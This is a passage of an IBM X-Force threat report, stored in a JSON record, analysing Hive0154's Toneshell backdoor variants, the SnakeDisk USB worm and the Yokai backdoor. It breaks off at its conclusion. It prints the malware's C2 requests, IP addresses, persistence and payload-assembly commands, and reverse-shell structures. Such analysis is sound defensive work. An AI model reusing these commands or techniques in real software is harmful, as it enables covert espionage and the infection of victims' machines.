{ "id": "41f40459-2d7d-4e5e-9ee9-72a4e6ebefd5", "created_at": "2026-04-06T00:08:34.925077Z", "updated_at": "2026-04-10T13:11:30.041899Z", "deleted_at": null, "sha1_hash": "37cd3681fbd8728979cff325ff205b4378d460c4", "title": "Hive0154, aka Mustang Panda, drops updated Toneshell backdoor and novel SnakeDisk USB worm", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2694339, "plain_text": "Hive0154, aka Mustang Panda, drops updated Toneshell backdoor\r\nand novel SnakeDisk USB worm\r\nBy Golo Mühr, Joshua Chung\r\nPublished: 2025-09-11 · Archived: 2026-04-05 15:14:14 UTC\r\nJoshua Chung\r\nCyber Threat Intelligence Analyst\r\nIBM Security\r\nIn July 2025, IBM X-Force discovered new malware attributed to China-aligned threat actor Hive0154. This\r\nincludes an updated Toneshell variant evading detections and supporting several new features, as well as a novel\r\nUSB worm called SnakeDisk discovered in mid-August. The worm only executes on devices with Thailand-based\r\nIP addresses and drops the Yokai backdoor, discovered by Netskope in December 2024.\r\nKey findings\r\nThroughout mid-2025, X-Force observed several Toneshell and Pubload malware variants in weaponized\r\narchives mostly uploaded from Singapore and Thailand.\r\nOne of the variants evading VirusTotal detections is the latest update \"Toneshell9\". It supports command\r\nand control (C2) communication through locally configured proxies to blend in with enterprise network\r\ntraffic and facilitates two reverse shells in parallel.\r\nX-Force analyzed a new USB worm, SnakeDisk, which only executes on devices located in Thailand,\r\nbased on their IP address. The worm displays code overlaps with Tonedisk and is able to detect new and\r\nexisting USB devices, which it weaponizes as a means of propagation.\r\nThe analyzed SnakeDisk sample drops the Yokai backdoor on infected devices, which sets up a reverse\r\nshell allowing operators to execute arbitrary commands. Yokai was previously tied to campaigns targeting\r\nThai officials in December 2024.\r\nBackground\r\nHive0154 is a well-established China-aligned threat actor with a large malware arsenal, consistent techniques, and\r\nwell-documented activity over the past several years. The group consists of multiple subclusters and engages in\r\ncyberattacks targeting public and private organizations, including think tanks, policy groups, government\r\nagencies, and individuals. X-Force's observation of the group's use of multiple custom malware loaders,\r\nbackdoors, and USB worm families showcases their advanced development capabilities. Hive0154 activity\r\noverlaps with threat actors publicly reported as Mustang Panda, Stately Taurus, Camaro Dragon, Twill Typhoon,\r\nPolaris, and Earth Preta.\r\nCyber espionage targeting East Asia\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 1 of 29\n\nThroughout mid-2025, X-Force observed several weaponized archives uploaded to VirusTotal from Singapore and\r\nThailand:\r\nFilename Malicious DLL C2 server Date\r\nMeeting Venue Request Information.zip\r\nLoader injecting Pubload\r\nshellcode\r\n188.208.141[.]\r\n196:443\r\nMay 21\r\nHotel Booking Request.7z Toneshell8\r\n146.70.29[.]\r\n229:443\r\nJuly 03\r\nCyber_Safety_\r\nChecklist_\r\n2025.rar\r\nToneshell8\r\n146.70.29[.]\r\n229:443\r\nJuly 30\r\nTNLA နှင့် အခြားတော်လှန်ရေးအင်အားစုများ.rar\r\n(translated Myanmar: \"TNLA and other\r\nrevolutionary forces\")\r\n Toneshell8\r\n146.70.29[.]\r\n229:443\r\nJuly 30\r\nScan(08-02-205).zip Toneshell8\r\n146.70.29[.]\r\n229:443\r\nAugust 05\r\nNotes.rar\r\nLoader injecting Pubload\r\nshellcode\r\n188.208.141[.]\r\n196:443\r\nAugust 21\r\nCallNotes.zip\r\nLoader injecting\r\nToneshell7 shellcode\r\n146.70.29[.]\r\n229:443\r\nSeptember\r\n04\r\nHive0154 was observed using a new loader to reflectively inject either Pubload or Toneshell7, as well as directly\r\ndeploying the more obfuscated Toneshell8 variant. The most recent Pubload variant has undergone minor changes\r\nand now supports decoy C2 servers and downloading shellcode payloads via HTTP POST in addition to raw TCP\r\nimitating TLS traffic.\r\nThe archive \"CallNotes.zip\" discovered in September was downloaded from Box Cloud Storage through a link in\r\na PDF lure impersonating the Myanmar Ministry of Foreign Affairs:\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 2 of 29\n\nFig. 1: PDF containing download link for weaponized archive deploying Toneshell7\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 3 of 29\n\nIn mid-August, X-Force also discovered SnakeDisk, a new USB worm sharing overlap with previous Tonedisk\r\nvariants. The worm only executes on devices located in Thailand as determined by their public IP address.\r\nSnakeDisk distributes the Yokai backdoor, which was publicly linked to several other Thailand-targeted\r\ncampaigns by Netskope in December 2024. \r\nGiven previous history of the Yokai backdoor being used against Thailand, the discovery of the latest USB worm\r\nseemed to coincide with recent geopolitical events surrounding Thailand:\r\nIn late May 2025, Thailand and Cambodia were involved in a border skirmish that resulted in the death of\r\na Cambodian soldier. Subsequent talks between Thailand and Cambodia broke down, with each side\r\nreinforcing troops along the border. \r\nIn June 2025, a phone call between Thailand's prime minister, Paetongtarn Shinawatra, and former\r\nCambodian leader, Hun Sen, was leaked, resulting in removal of Thai prime minister.\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 4 of 29\n\nOn July 24, 2025, multiple border clashes between Thailand and Cambodia ensued, including use of\r\nartillery, airstrikes, and naval bombardments. On July 28, 2025, both sides reached a tentative truce,\r\nbrokered by US and Malaysia.\r\nIn early August 2025, the Cambodian government accused Thai military of planning an assassination strike\r\nagainst the Cambodian prime minister, which Thai government denied. The Cambodian government cited\r\n'unnamed foreign intelligence' as its source.\r\nTraditionally, the People's Republic of China (PRC) has been a benefactor to Cambodia, supplying weapons and\r\ninvesting billions in infrastructure projects. Recent geopolitical events may have provided impetus for Hive0154\r\nto initiate conduct operations against Thailand. The deployment of the SnakeDisk USB-worm configured to only\r\nexecute on Thailand-based machines, seems to suggest that Hive0154 may be seeking to penetrate air-gap\r\nsystems, often employed in government networks.\r\nToneshell8 updates (March 2025)\r\nX-Force first observed Toneshell version 8 in March 2025. It is very similar in behavior to the previous version 7,\r\nbut contains minor updates to evade static detection and hinder analysis. The most visible change is the inclusion\r\nof junk code within the malware's functions. These junk code sections implement the following behavior:\r\nUse API calls to write random temporary files and delete them again\r\nCopy and loop through a string. The strings used in the initial samples were copied from OpenAI's\r\nChatGPT website\r\nSleep for random intervals\r\nThese three code examples can be found, for instance, in the function resolving all of the API's:\r\nFig. 2: Random sleep junk code\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 5 of 29\n\nFig. 3: Random file created and deleted in junk code\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 6 of 29\n\nFig. 4: Useless string scanning in junk code\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 7 of 29\n\nToneshell8 developers also chose to replace the Pseudo Random Number Generator (PRNG) with a custom Linear\r\nCongruential Generator (LCG) implementation using different constants, for example:\r\nDWORD __cdecl zf_update_prng(main_struct *main_struct) {   main_struct-\u003eprng_state = 0xBD828 *\r\nmain_struct-\u003eprng_state + 0x4373A;   return main_struct-\u003eprng_state; }\r\nThe PRNGs are used in Toneshell to generate a victim ID, C2 traffic encryption keys, and verify C2 beacon\r\nauthenticity. The implementations in Toneshell8 samples vary greatly in quality. The generator above, for instance,\r\nis used by the 4 samples listed above and only produces 11 different states for most seeds. \r\nLastly, the hardcoded response codes sent to the C2 server, which notify operators of the status of certain\r\ncommands, are now obfuscated by calculating them from different hardcoded integers in the sample. \r\nToneshell9 (July 2025)\r\nIn July, X-Force discovered a new Toneshell variant, which we will refer to as Toneshell9. It contains significant\r\nupdates and does not have any detections on VirusTotal at the time of writing\r\n(318a1ebc0692d1d012d20d306d6634b196cc387b1f4bc38f97dd437f117c7e20). \r\nThe new Toneshell variant was first observed in trojanized RAR archives containing \"USB Safely Remove\"\r\nsoftware. The code structure appears to have been based on a forked variant from December 2024, which contains\r\nthe identical C2 configuration.\r\nInitialization\r\nSimilar to previous variants, Toneshell9 is executed as a sideloaded DLL. The weaponized RAR archive contains\r\na BAT file, launching a legitimate executable \"USBSRService.exe\" with a \"-Embedding\" command line argument.\r\nOnce the Toneshell DLL \"EasyFuncs.dll\" is loaded into memory and the export FS_RegActiveX is executed, it\r\nbegins by resolving a first set of APIs needed for initialization. After parsing the \"-Embedding\" command line\r\nargument, Toneshell launches its parent executable in a new process with the argument \"EvtSys\". The latter\r\nargument triggers the malicious DLL's main behavior. \r\nToneshell begins by initializing a new client object holding the following values:\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 8 of 29\n\nstruct TONESHELL_CLIENT {   BYTE is_connected;   HANDLE heartbeat_thread;   C2_CLIENT *p_c2_client;\r\n  DWORD unused_C;   VICTIM_DATA *p_victim_data;   DWORD unused_14;   QWORD tick_count; };\r\nIt then goes on to resolve the rest of its necessary APIs via a custom hashing function and stores the function\r\npointers in a separate struct. Next, it creates a new event \"Windows External Module\" which acts as a mutex to\r\nprevent multiple instances from running on the same machine. \r\nToneshell9 is littered with several sections of junk code, which retrieves the current number of CPU ticks, stores\r\nthe result as a string and deallocates it again. \r\nFig. 5: Toneshell9 junk code within API resolving logic\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 9 of 29\n\nTo manage and store C2 communication, proxy servers, beacons, and payloads in memory, Toneshell instantiates a\r\nlarge 129KB object:\r\nstruct C2_CLIENT {   std::vector\u003cstd::string\u003e c2_list;   SOCKADDR_IN c2_sockaddr_array[16];   int\r\ncurrent_c2_sockaddr_index;   int number_of_c2s;   BYTE key[768];   SOCKET ptr_socket;   DWORD\r\nbeacon_tls_header;   BYTE beacon_payload_buffer[65536];   BYTE c2_response_buffer[65536];   DWORD\r\nsize_of_c2_response;   BYTE critical_section[24];   std::list\u003cproxy_entry\u003e proxy_list;   int proxy_enabled;   int\r\ncurrent_c2_string_index; };\r\nUnlike previous variants, Toneshell9 enumerates the HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER\r\nand HKEY_USERS\\\\.DEFAULT registry hives to search for locally configured proxy servers. \r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 10 of 29\n\nFig. 6: Toneshell9 parsing proxy servers from the Windows registry\r\nIf a server is found, both the URL's protocol (http, https, ftp, or socks) and the full URL are stored as strings in a\r\nlist of objects. \r\nNext, Toneshell stores its C2 server domain and IP address in a vector of strings. The same hardcoded IP and port\r\nare directly stored in an array of SOCKADDR_IN structures. The malware then loops through the C2 server\r\nstrings, resolving the IP address for each of them and adding it into the same array of SOCKADDR_IN structures.\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 11 of 29\n\nFig. 7: Toneshell resolving and storing C2 server addresses\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 12 of 29\n\nAs observed in previous variants, Toneshell proceeds to drop a file containing a random 16 byte victim GUID\r\ngenerated via the Windows _rand() function:\r\nC:\\ProgramData\\ProgrammaticallyCpp.inc\r\nThe GUID is also stored in a struct together with the path of the file and the victim's NetBIOS name. \r\nstruct VICTIM_DATA {   BYTE victim_guid[16];   BYTE computername[24];   BYTE guid_path[24]; };\r\nThe data above is used to construct a beacon object in memory. Notably, Toneshell9 performs calculations on the\r\ndifference in the CPU's tick count before and after the main initialization behavior detailed above. This value is\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 13 of 29\n\nnormalized, and likely used to detect anomalies in execution time which could indicate a delayed sandbox\r\nexecution or debugging. \r\nstruct BEACON_DATA {   BYTE key[768];      BYTE code_byte;       // set to 0x02   BYTE victim_guid[16];  \r\nBYTE computername[80];   DWORD tick_delta; };\r\n The 0x300 byte XOR key is generated via _rand() and used to encrypt the 101 bytes of data, starting at offset\r\n0x300. The data above is packaged into a fake TLS 1.2 Application Data packet of the following format:\r\nstruct BEACON {   BYTE tls_header[3];       // 17 03 03   WORD payload_size;        // 0x0365 (big-endian)  \r\nBYTE payload_data[869];   };\r\nC2 communication and HTTP proxy\r\nDuring the main loop Toneshell9 executes a function to establish a socket connection to its C2 server. It begins by\r\nattempting to connect via the first SOCKADDR_IN structure. If that fails, the malware tries to setup a socket\r\nconnection through any of the proxy servers collected from the registry. This is attempted for each of the C2\r\naddress strings, i.e. the IP address and domain for the sample analyzed above. \r\nAfter resolving the IP address of the proxy server and connecting via a TCP socket, it first sets the send and\r\nreceive timeouts to 1 minute. Next, it sends the following connect request: \r\nCONNECT \u003cC2 server\u003e:\u003cC2 port\u003e HTTP/1.0 Host: \u003cC2 server\u003e:\u003cC2 port\u003e Content-Length: 0 Proxy-Connection: Keep-Alive Pragma: no-cache\r\nIf the proxy server returns a 2xx status code, the connection has been established successfully and is ready for raw\r\nTCP tunneling. To verify the connection with its C2 server, Toneshell9 uses a short handshake protocol, also\r\ntransmitting the server's IP and port in the process. If the handshake is successful, the handle to the socket is stored\r\nin the C2_CONNECTION struct and the socket timeouts are set to 2 minutes. Toneshell then sends the first\r\nadvertisement beacon through the socket. \r\nIt expects a similar response back from its server, which apart from the first 5 bytes is encrypted via the previously\r\ntransmitted XOR key:\r\nstruct C2_RESPONSE {     BYTE tls_header[3];     // 17 03 03     WORD payload_size;      // big-endian     BYTE\r\ncommand_code;     BYTE shell_id;     BYTE data[]; }\r\nBy using a proxy already configured on an infected device, Toneshell can effectively blend in with other network\r\ntraffic. Larger enterprise environments often enforce egress filtering, only allowing traffic through trusted\r\ngateways, which would block direct C2 communication. Toneshell's added capability of circumventing this\r\nfiltering allows it to operate within well-secured network environments.\r\nReverse shell\r\nUpon receiving the first C2 response, Toneshell starts a new thread that sends heartbeat-like response beacons\r\nevery 30 seconds, with the 0x1 response code and a random shell_id value. Response beacons have a very similar\r\nformat:\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 14 of 29\n\nstruct BEACON_CMD_RESPONSE {     BYTE tls_header[3];     // 17 03 03     WORD payload_size;      // big-endian     BYTE response_code;     BYTE shell_id;     BYTE data[]; }\r\nToneshell9 supports the following command codes:\r\nCode Description\r\n2 Skip this beacon and wait for the next one to handle.\r\n3 Create a new reverse shell and assigns it to the shell_id.\r\n4 Write a command string to the reverse shell identified by the shell_id\r\n5 Close the reverse shell identified by the shell_id\r\nSimilar to previous variants, a reverse shell is set up using anonymous pipes connected to stdin and stdout handles\r\nof a new cmd.exe process. Toneshell9 supports two active reverse shells in parallel and uses the structure below to\r\nmanage a shell connection:\r\nstruct REVERSE_SHELL {   int shell_id;   BYTE cmd_path[24];   HANDLE hReadPipe1;   HANDLE\r\nhWritePipe1;   HANDLE hReadPipe2;   HANDLE hWritePipe2;   DWORD hThread_cmd;   DWORD\r\nhProcess_cmd;   DWORD parent_pid;   BYTE cmd_process_created;   DWORD hThread_pipe_to_c2; };\r\nFor each reverse shell, a new thread is created to regularly check for new data from the stdout pipe and send it\r\nback to the C2 server in a beacon with response code 0x4. Toneshell operators can write string data to the pipe\r\nusing the correct shell_id and execute arbitrary commands on the machine. When closing a reverse shell, the\r\nconhost.exe process identified by the parent_pid is also terminated on the machine. \r\nSnakeDisk USB worm\r\nIn August 2025, X-Force discovered a previously unknown USB worm which was attributed to Hive0154. The 32-\r\nbit DLL was uploaded to VirusTotal as \"01.dat\" from Thailand and displays similar features to Toneshell9. Both\r\nare executed via DLL sideloading, with all exports except for the DllEntryPoint and the malware's entry point\r\npointing to the same function, which immediately returns. They also both feature nearly identical API resolution\r\nmechanisms, which is consistent with almost all Toneshell-related malware. Similar to the Toneshell9 sample,\r\nSnakeDisk also reads a command-line argument to select one of two possible execution paths:\r\n\"-Embedding\": starts the USB infection behavior before dropping and executing the embedded payload\r\nonce a device is removed.\r\n\"-hope\": immediately drops and executes the embedded payload.\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 15 of 29\n\nInitialization\r\nIn order to execute the USB infection functionality, SnakeDisk requires a configuration file, which it searches for\r\nin the parent executable's current directory. Any files found in that directory, unless they are named \"System\r\nVolume Information\", will be added to a list of potential configuration files. Tonedisk goes on to open and read\r\neach file, testing the following conditions to verify the file before proceeding with the decryption.\r\nFile size is between 0x14A and 0x14000 bytes\r\nThe first 4 bytes are the correct CRC32 hash of the rest of the file\r\nSnakeDisk proceeds by decrypting the data using a likely custom 2-phase XOR algorithm and a 320-byte key\r\nstored in a 330-byte header. \r\nFig. 8: XOR-based configuration decryption algorithm\r\nFinally, the malware parses 18 string values that define the configuration of the malware. X-Force was unable to\r\nrecover a configuration file; however, analysis of SnakeDisk revealed the following likely purposes of the values.\r\nConfiguration\r\nfield\r\nPurpose\r\nversion\r\nMalware version used to determine if an already infected client should be reinfected\r\nwith an updated variant.\r\nmutx Mutex string.\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 16 of 29\n\npsd\r\nNot used in the analyzed sample. Possibly local equivalent to \"usd\" - all \"u*\" values are\r\nfile/directory names on the USB after weaponization. \r\nurd\r\nPossibly \"USB root directory\". Directory name created on the USB which contains\r\nsubdirectories.\r\nuud\r\nPossibly \"USB user directory\". Directory name under \u003curd\u003e which contains the users\r\noriginal files from the USB.\r\nusd\r\nPossibly \"USB staging directory\". Directory name under \u003curd\u003e storing various\r\nmalicious components of SnakeDisk.\r\npnex\r\nPossibly \"parent name executable\". Filename of a file existing in SnakeDisk's current\r\ndirectory during execution.\r\npndl\r\nPossibly \"parent name DLL\". Filename of a file existing in SnakeDisk's current\r\ndirectory during execution.\r\npnen\r\nPossibly \"parent name encrypted\". Filename of a file existing in SnakeDisk's current\r\ndirectory during execution.\r\npnendl\r\nPossibly \"parent name encrypted DLL\". Filename of a file existing in SnakeDisk's\r\ncurrent directory during execution.\r\nunex Possibly \"USB name executable\". Filename of a file copied from \u003cpnex\u003e to the USB.\r\nundl Possibly \"USB name DLL\". Filename of a file copied from \u003cpndl\u003e to the USB.\r\nunen Possibly \"USB name encrypted\". Filename of a file copied from \u003cpnen\u003e to the USB.\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 17 of 29\n\nunendl\r\nPossibly \"USB name encrypted DLL\". Filename of a file copied from \u003cpnendl\u003e to the\r\nUSB.\r\nunendl_org\r\nFilename of a (likely DLL) file copied from \u003cpnendl\u003e to the USB's root directory and\r\nhidden via file attributes.\r\nunconf Filename of the SnakeDisk config dropped to the USB.\r\nregkey Potentially relates to a registry persistence mechanism. Not used in the analyzed sample.\r\nschkey\r\nPotentially relates to a scheduled task persistence mechanism. Not used in the analyzed\r\nsample.\r\nAfter successfully reading its configuration file, SnakeDisk will try to confirm that it is currently executing on a\r\nThailand-based machine. It sends an HTTP GET request to http://ipinfo[.]io/json and checks if the \"country\" field\r\nmatches either \"THA\" or \"TH\". If that is true, execution continues.\r\nGET /json HTTP/1.1 Connection: Keep-Alive User-Agent: Program/1.0 Host: ipinfo.io\r\nNotably, execution will also continue if an error occurs while resolving APIs or during network communication. \r\nSnakeDisk then ensures it only runs in a single instance by attempting to open a mutex \"Global\\\\\u003cmutx config\r\nvalue\u003e\". If the mutex already exists, the malware exits; otherwise, it creates the mutex via CreateMutexW.\r\nUSB device detection\r\nIn order to infect any already connected USB drives, SnakeDisk begins to loop through all possible drive letters\r\nfrom A-Z. It opens a handle to the physical volume, such as \"\\\\.\\A:\" and sends the IO control code\r\nIOCTL_STORAGE_GET_HOTPLUG_INFO (0x2D0C14) to the device. If the device is a hotplug device\r\naccording to the returned STORAGE_HOTPLUG_INFO struct, it launches a new thread to infect that drive. \r\nAfter going through all drive letters, SnakeDisk sleeps for 5 seconds and then registers a new window class\r\n\"TestClassName\" and creates a corresponding window \"TestWindowName\". In order to retrieve messages from\r\nthe operating system, the function creates a Windows Message loop using GetMessageW and dispatches the\r\nmessages to the malware's window procedure via TranslateMessage and DispatchMessageW. It only exits the loop\r\nwhen receiving a WM_CAP_PAL_OPEN (0x450) message. The malicious window class references a custom\r\nprocedure which listens for the WM_DEVICECHANGE (0x219) message, and specifically the\r\nDBT_DEVICEARRIVAL (0x8000) and DBT_DEVICEREMOVECOMPLETE (0x8004) events. \r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 18 of 29\n\nFig. 9: Window class callback function listening for WM_DEVICECHANGE messages\r\nIf such a message is received, for instance, when a USB device is plugged into the infected machine, the function\r\nuses the \"dbcv_unitmask\" field of the DEV_BROADCAST_VOLUME structure to determine the drive letter of\r\nthe corresponding device. For newly connected devices, a new thread is launched to infect the drive. If SnakeDisk\r\ndetects a device removal, it starts a thread to drop and execute its embedded payload, which initiates the same\r\nexecution path that the SnakeDisk DLL's execution with the \"-hope\" command line argument would have caused. \r\nUSB propagation\r\nThe thread to infect a detected USB device begins by searching the drive for an existing config file to determine if\r\nit was already infected. It attempts to decrypt and parse a configuration from any file with a .dat or .cd extension.\r\nIf a configuration is parsed, the malware compares the version number of the already infected drive to the version\r\nof its own configuration and will only reinfect drives with older versions of SnakeDisk on them. \r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 19 of 29\n\nSnakeDisk then launches another thread to move the existing files on the USB into a new subdirectory. By\r\nessentially hiding the files a user expects on their USB, the malware increases the chance of a victim believing the\r\nUSB has not yet been opened and accidentally clicking the weaponized executable on a new machine bearing the\r\nsame name as the device. After execution, the malicious launcher would copy back the users' files to avoid any\r\nsuspicion. The path containing the user's data on an infected device is built from the configuration values as:\r\n\u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cuud\u003e\\\r\nThe malware may use two different mechanisms for the operation; each launched in its own respective thread. The\r\nfirst uses SHFIleOperationW to move each file, and during every operation, also reads 32 bytes from a file\r\n\"C:\\\\Windows\\\\Tmp\\\\msd.log\", which are written to a file \"C:\\\\ProgramData\\\\app.log\" before deleting the latter.\r\nThe purpose of this behavior is unclear. \r\nFig. 10: Moving files from the USB into a new directory\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 20 of 29\n\nWhile the thread runs, the malware regularly checks for successful completion for 30 seconds before launching a\r\nsecond thread. The second thread uses robocopy to move the files and executes the following command in a new\r\nprocess:\r\nrobocopy \u003cdrive_letter\u003e:\\ \u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cuud\u003e\\ /XD \"\u003cdrive_letter\u003e:\\\u003curd\u003e\\\" /XF \"\u003cdrive_letter\u003e:\\\r\n\u003cunendl_org\u003e\" /XF \"\u003cdrive_letter\u003e:\\\u003cusb_volumename\u003e.exe\" /XD \"System Volume Information\" /E /MOVE\r\nBoth file movements exclude SnakeDisk's weaponized files and the \"System Volume Information\" file, which\r\nshould remain in the USB disk's root directory. After running the command above, the same command is launched\r\nagain with two additional flags \"/IS\" and \"/XO\", to include the same files, and exclude source directory files older\r\nthan the destination. \r\nAfter moving already existing files on the USB, SnakeDisk goes on to copy its own payloads from its current\r\ndirectory to the USB drive. The following files, as specified in the configuration, are copied via CopyFileW, each\r\nin a new thread:\r\n.\\\u003cpnex\u003e copied to \u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cusd\u003e\\\u003cunex\u003e .\\\u003cpndl\u003e copied to \u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cusd\u003e\\\u003cundl\u003e\r\n.\\\u003cpnen\u003e copied to \u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cusd\u003e\\\u003cunen\u003e .\\\u003cpnendl\u003e copied to \u003cdrive_letter\u003e:\\\u003curd\u003e\\\u003cusd\u003e\\\r\n\u003cunendl\u003e .\\\u003cpnen\u003e copied to \u003cdrive_letter\u003e:\\\u003cusb_volumename\u003e.exe .\\\u003cpnendl\u003e copied to \u003cdrive_letter\u003e:\\\r\n\u003cunendl_org\u003e\r\nThe EXE's file name in the root of the USB drive is set to the volume name of the USB device, or just \"USB.exe\"\r\nif it is empty. SnakeDisk also sets the attributes SYSTEM and HIDDEN on the file copied to \"\u003cdrive_letter\u003e:\\\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 21 of 29\n\n\u003cunendl_org\u003e\". All directories on the USB carry those attributes as well, effectively hiding everything apart from\r\nthe executable. Although X-Force did not retrieve any of the other files, previous USB worms used the same\r\ntechnique to lure victims into clicking the executable, which would sideload a DLL to initiate the infection. That\r\nmalicious DLL's filename is likely stored in the \"unendl_org\" configuration value. Lastly, SnakeDisk writes its\r\nconfiguration to a new file on the USB with the name from the \"unconf\" value. \r\nPayload execution\r\nThe SnakeDisk thread responsible for dropping and executing its embedded payload is launched when a USB\r\ndevice removal is detected, or at the beginning of SnakeDisk's execution via the \"-hope\" command line argument. \r\nFirst, the thread reads a marker file \"vm.ini\" in its directory and compares the content to its own current path. This\r\nfile is also written after successful dropping and execution of payloads and indicates if a victim has already been\r\ninfected with SnakeDisk's embedded payload. If the paths match, no payloads will be dropped and the thread\r\nterminates. \r\nAfter the first check, SnakeDisk begins to drop a series of payloads to the \"C:\\Users\\Public\\\" directory. Each file is\r\nconstructed in memory from immediate values in large functions between 0.6 and 3.3 MB.\r\nFig. 11: Disassembled function constructing a binary payload\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 22 of 29\n\nThe payloads are then decrypted via a simple XOR operation before being dropped as files to:\r\nC:\\Users\\Public\\srv0\r\nC:\\Users\\Public\\srv1\r\nC:\\Users\\Public\\srv2\r\nC:\\Users\\Public\\loga\r\nC:\\Users\\Public\\logb\r\nC:\\Users\\Public\\logc\r\nThese files are concatenated together in groups of three to produce the two final payloads via the following\r\ncommands:\r\ncmd.exe /c cd \"c:\\users\\public\\\" \u0026 copy /b \"srv0\"+\"srv1\"+\"srv2\" c:\\users\\public\\libcef.dll cmd.exe /c cd\r\n\"c:\\users\\public\\\" \u0026 copy /b \"loga\"+\"logb\"+\"logc\" c:\\users\\public\\\u003crandomised_name\u003e.exe\r\nThe EXE's filename is created from 10 random uppercase letters and numbers. After concatenation, the files are\r\ndeleted. \r\nFinally, the executable is launched in a new process with a hardcoded command line argument:\r\nc:\\users\\public\\\u003crandomised_name\u003e.exe -project-mod\r\nUnsurprisingly, the EXE (bb5bb82e5caf7d4dbbe878b75b23f793a5f3c5ca6dba70d8be447e8c004d26ce) is a\r\nlegitimate and signed executable (acwebbrowser.exe) which sideloads the malicious libcef.dll during execution. \r\nYokai backdoor\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 23 of 29\n\nThe DLL payload was identified as the Yokai backdoor, reported on in December 2024 by Netskope. Upon\r\nexecution, the malware first checks for the \"-project-mod\" argument and then establishes persistence via a\r\nscheduled task if the user is not a member of the Administrator's group:\r\ncmd.exe /c schtasks /create /f /sc MINUTE /MO 5 /tn \"MicrosoftEdgeAcModuleUpdateTask\" /tr \"\u003cpath\u003e -project-mod\"\r\nIt goes on to create a new mutex \"k1tpddvivh74fo1et725okr1c1\" and initializes an internal configuration\r\nstructure. The variant dropped by SnakeDisk contains the version string \"1.0.0\" and reaches out to a hardcoded C2\r\nserver via HTTP POST requests:\r\nPOST /kptinfo/import/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: WinHTTP Example/1.0 API-INDEX: 0 Accept-Connect: 0 Content-Length: 156 Host:\r\n118.174.183[.]89 \u003cencrypted data\u003e\r\nAs described in Netskope's analysis, Yokai is used to create a reverse shell through anonymous pipes, allowing\r\noperators to execute arbitrary commands on the infected machine. \r\nInterestingly, Yokai shows overlaps with other backdoor families attributed to Hive0154, such as Pubload/Pubshell\r\nand Toneshell. Although those families are clearly separate pieces of malware, they roughly follow the same\r\nstructure and use similar techniques to establish a reverse shell with their C2 server.\r\nOverlaps with Tonedisk\r\nX-Force analysis also revealed strong overlaps between SnakeDisk and Tonedisk. Over the years, there have been\r\nseveral USB worm families associated with Hive0154. Variants strongly related to the Toneshell family in their\r\nimplementations are tracked by X-Force as Tonedisk. So far, there have been 3 major Tonedisk versions (A, B and\r\nC) identified. Each of the Tonedisk versions is a suite of different malicious components that make up the full\r\nfunctionality of the USB worm. These components include launchers, loaders, spreaders, encrypted files, installers\r\nand backdoors.\r\nSnakeDisk overlaps specifically with the ToneDisk A variant, which was also reported on in mid-2023 by\r\nCheckpoint as WispRider. Both malware's USB propagation mechanisms, API hashing and configuration files\r\ndisplay several similarities, which align with Hive0154 subclusters' known tendency to share and repurpose\r\nmalware among themselves. \r\nAttribution\r\nX-Force tracks the activity in this report under the Hive0154 umbrella cluster, which partially overlaps with\r\nactivity published as Mustang Panda, Stately Taurus, Camaro Dragon, Twill Typhoon, Polaris, TEMP.Hex, and\r\nEarth Preta. This group appears to maintain a considerably large malware ecosystem with frequent overlaps in\r\nboth malicious code, techniques used during attacks, as well as targeting. Within the larger umbrella cluster, X-Force separates at least three subclusters of activity with low confidence, with each cluster associated with one of\r\nthe central malware strains PlugX, Toneshell, and Pubload. Notably, each malware strain is paired with a different\r\nUSB worm framework and one or more related loader malware variants, which change more frequently. The same\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 24 of 29\n\nloader may be used for different payloads, such as Toneshell or Pubload, within the same timeframe. However, it\r\nis important to note that the clustering of activity does not automatically signal that they are operating as separate\r\nsubgroups. \r\nActivity associated with the use of SnakeDisk and the Yokai backdoor possibly indicates a further subcluster of\r\nHive0154. It currently appears to be mainly targeted towards Thailand, as evident from IP geolocation checks in\r\nSnakeDisk and Netskope reporting. \r\nConclusion\r\nHive0154 remains a highly 